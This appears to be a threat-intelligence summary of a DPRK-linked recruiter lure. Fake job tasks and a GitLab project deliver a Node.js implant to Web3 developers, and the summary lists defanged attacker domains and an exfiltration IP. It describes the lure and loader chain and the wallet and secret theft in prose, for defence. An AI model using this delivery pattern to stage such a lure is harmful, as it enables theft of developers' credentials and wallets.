A DPRK-linked recruiter lure targeted Web3 developers through LinkedIn messages, a Notion assignment, and a public GitLab project that executed a multi-stage Node.js implant when cloned and run locally. The loader fetched attacker-controlled JavaScript from Chainlink-themed typosquat infrastructure, first chainlink-api-v3[.]cloud and later chainlink-api-v3[.]com, then used dynamic execution to start host fingerprinting, VM checks, socket.io C2, and clipboard theft. Follow-on payloads installed runtime dependencies, opened interactive command execution, deployed a keylogger, and recursively searched for wallets, environment files, documents, and other developer secrets for exfiltration to 172[.]86[.]116[.]178. The campaign matters because it embeds malware delivery inside a routine developer workflow and specifically increases the chance of stealing Web3 credentials, wallets, and cloud secrets from targeted candidates.